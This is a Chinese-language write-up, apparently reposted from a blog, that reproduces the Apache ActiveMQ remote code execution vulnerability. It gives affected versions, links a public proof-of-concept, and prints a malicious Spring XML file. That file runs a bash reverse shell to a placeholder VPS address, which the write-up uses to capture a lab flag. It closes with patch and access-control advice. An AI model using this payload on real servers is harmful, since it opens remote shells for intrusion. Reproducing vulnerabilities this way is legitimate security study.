Apache ActiveMQ RCE漏洞復(fù)現(xiàn)
1、 產(chǎn)品簡(jiǎn)介
ActiveMQ是一種開(kāi)源的基于JMS(Java Message Servie)規(guī)范的一種消息中間件的實(shí)現(xiàn),ActiveMQ的設(shè)計(jì)目標(biāo)是提供標(biāo)準(zhǔn)的,面向消息的,能夠跨越多語(yǔ)言和多系統(tǒng)的應(yīng)用集成消息通信中間件。ActiveMQ是Apache出品,最流行的,能力強(qiáng)勁的開(kāi)源消息總線。
2、 漏洞概述
Apache ActiveMQ 中存在遠(yuǎn)程代碼執(zhí)行漏洞,Apache ActiveMQ在默認(rèn)安裝下開(kāi)放了61616服務(wù)端口,而該端口并沒(méi)有對(duì)傳入數(shù)據(jù)進(jìn)行適當(dāng)?shù)倪^(guò)濾,從而使攻擊者能夠構(gòu)造惡意數(shù)據(jù)以實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。
3、 影響范圍
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
4、 漏洞復(fù)現(xiàn)
PoC地址:https://github.com/trganda/ActiveMQ-RCE
把項(xiàng)目Get到本地,導(dǎo)入IDEA中運(yùn)行
因?yàn)槲译娔X上JDK安裝的是1.8.0,直接運(yùn)行會(huì)發(fā)現(xiàn)報(bào)錯(cuò)
所以在此處安裝JDK11:
5、 漏洞利用
準(zhǔn)備好惡意文件:rec.xml,將其上傳到自己的VPS,其中將your-ip改成自己vps地址。
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/your-ip/6666 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>
修改Main.java以下兩處,一個(gè)是目標(biāo)地址,一個(gè)是惡意文件地址
在vps中使用python開(kāi)啟http服務(wù)
再使用nc實(shí)現(xiàn)監(jiān)聽(tīng)
接著運(yùn)行Main.java
成功反彈shell,ls查看拿到flag
6、 修復(fù)建議
通過(guò)網(wǎng)絡(luò)ACL策略限制訪問(wèn)來(lái)源,例如只允許來(lái)自特定IP地址或地址段的訪問(wèn)請(qǐng)求。
升級(jí)修復(fù):
Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-813868.html
Apache ActiveMQ >= 5.15.16文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-813868.html
到了這里,關(guān)于Apache ActiveMQ RCE漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!